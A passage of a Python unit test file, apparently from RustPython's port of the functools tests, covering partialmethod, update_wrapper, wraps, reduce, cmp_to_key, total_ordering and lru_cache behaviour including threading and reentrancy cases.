self.assertEqual(b.method(2, x=3), ((b, 2), {'a': 1, 'x': 3}))
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
def test_positional_only(self):
def f(a, b, /):
return a + b
p = functools.partial(f, 1)
self.assertEqual(p(2), f(1, 2))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce:
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.reduce(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.reduce(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.reduce(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.reduce(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.reduce(add, Squares(10)), 285)
self.assertEqual(self.reduce(add, Squares(10), 0), 285)
self.assertEqual(self.reduce(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.reduce)
self.assertRaises(TypeError, self.reduce, 42, 42)
self.assertRaises(TypeError, self.reduce, 42, 42, 42)
self.assertEqual(self.reduce(42, "1"), "1") # func is never called with one item
self.assertEqual(self.reduce(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.reduce, 42, (42, 42))
self.assertRaises(TypeError, self.reduce, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.reduce, add, "")
self.assertRaises(TypeError, self.reduce, add, ())
self.assertRaises(TypeError, self.reduce, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.reduce, add, TestFailingIter())
self.assertEqual(self.reduce(add, [], None), None)
self.assertEqual(self.reduce(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.reduce, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.reduce(add, SequenceClass(5)), 10)
self.assertEqual(self.reduce(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.reduce, add, SequenceClass(0))
self.assertEqual(self.reduce(add, SequenceClass(0), 42), 42)
self.assertEqual(self.reduce(add, SequenceClass(1)), 0)
self.assertEqual(self.reduce(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.reduce(add, d), "".join(d.keys()))
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduceC(TestReduce, unittest.TestCase):
if c_functools:
reduce = c_functools.reduce
class TestReducePy(TestReduce, unittest.TestCase):
reduce = staticmethod(py_functools.reduce)
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_bad_cmp(self):
super().test_bad_cmp()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cmp_to_key(self):
super().test_cmp_to_key()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cmp_to_key_arguments(self):
super().test_cmp_to_key_arguments()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_hash(self):
super().test_hash()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_obj_field(self):
super().test_obj_field()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_sort_int(self):
super().test_sort_int()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_sort_int_str(self):
super().test_sort_int_str()
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_no_args(self):
@self.module.lru_cache
def square(x):
return x ** 2
self.assertEqual(list(map(square, [10, 20, 10])),
[100, 400, 100])
self.assertEqual(square.cache_info().hits, 1)
self.assertEqual(square.cache_info().misses, 2)
self.assertEqual(square.cache_info().maxsize, 128)
self.assertEqual(square.cache_info().currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
# This cause the cache to have orphan links not referenced
# by the cache dictionary.
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
nonlocal once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
# LRU cache guarantees that it will only call __hash__
# only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown-off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can be not equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with support.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with support.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with support.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
